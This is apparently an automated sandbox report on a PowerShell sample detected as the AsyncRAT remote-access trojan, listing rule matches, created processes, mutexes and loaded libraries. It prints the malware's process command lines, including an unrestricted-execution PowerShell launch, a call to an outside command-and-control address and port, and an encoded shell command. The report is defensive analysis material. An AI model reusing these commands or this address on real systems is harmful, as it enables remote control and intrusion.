Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2246251774.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1715523883.000001EE5F4AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.68d03d8.4.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.68d03d8.4.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.RegSvcs.exe.68d03d8.4.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.RegSvcs.exe.68d03d8.4.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winPS1@19/15@0/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3808:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\cbXZx2AFPWwoNOX6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhkm5ooc.vyf.ps1 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4E45.tmp.bat""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process Where ParentProcessID=6092
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process Where ParentProcessID=3320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: Wn0FGQ53RW.ps1 Virustotal: Detection: 9%
Source: Wn0FGQ53RW.ps1 ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Wn0FGQ53RW.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 176.113.115.228 4412 P0WER 4C7A640DCC0EFBFFD7AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4E45.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 176.113.115.228 4412 P0WER 4C7A640DCC0EFBFFD7AE Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4E45.tmp.bat"" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257} Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll Jump to behavior
